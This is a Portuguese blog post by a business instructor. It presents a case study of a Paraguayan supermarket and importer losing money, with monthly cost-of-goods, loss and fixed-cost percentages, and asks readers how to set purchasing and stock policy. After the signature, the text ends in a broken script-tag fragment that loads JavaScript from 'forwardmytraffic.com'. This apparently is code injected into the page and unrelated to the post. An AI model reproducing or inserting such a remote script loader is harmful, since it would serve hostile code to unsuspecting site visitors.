Olá, Pessoal.
Acabou a moleza! Vamos colocar os neurônios para trabalhar e encontrar soluções lucrativas e rentáveis para as empresas nesse ano.
Então chega de conversa, e vamos lá:
Em 2015, na Capital Asunción, Paraguai, mais um empresário encontrava-se num dilema “sem solução”.
Num supermercado mais uma importadora de grande porte, com muitos anos de vida e crescimento contínuo, movimentando BILHÕES DE DÓLARES x ano, o inesperado estava acontecendo. Segundo o proprietário, nos anos de 2013 e 2014 o dinheiro começou a diminuir de maneira não perceptível, pois foi aos poucos, e não conseguiu perceber a mudança.
O fato é que um supermercado e uma importadora, ambos são comércios que compram e vendem mercadorias, portanto participam dessa “gangorra” chamada comércio.
Com uma venda expressiva, CMV alterado, perdas consideravelmente controladas, e um custo fixo dentro do padrão, encontramos o seguinte cenário mensal:
CMV: 78,456%, PERDAS: 0,7544%, CUSTO FIXO: 13,8452%
Portanto, gostaria da opinião dos amigos, para encontrarmos a melhor solução para essa empresa.
O grande tema estava nas compras. Diante de uma envergadura dessa, qual o índice ideal de CMV? No caso de comprar um produto com 10% de desconto com volume, e o mesmo produto sem desconto na quantidade exata: Qual das opções deveríamos optar? Devemos fazer estoque de mercadorias ou não? Se sim, de quais produtos? O que faz encarecer o CMV (Custo da mercadoria vendida)? Como devemos determinar a política comercial para essa empresa, de forma a valorizar o ponto de venda ao ingressar um novo produto na loja ou na importadora? Qual é o principal fator que pesará mais para a tomada de decisão final?
Parece fácil, mas não é.
Lembrem-se.…vocês têm bilhões de dólares na mão e não podem errar, e a palavra de vocês, será a palavra final.
Conhecimento + Foco + Disciplina = Resultados
Portanto, mãos à obra.
Estou ansioso para saber a opinião de vocês.
Qualquer dúvida estou à disposição.
Abraço,
Prof. Christian… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>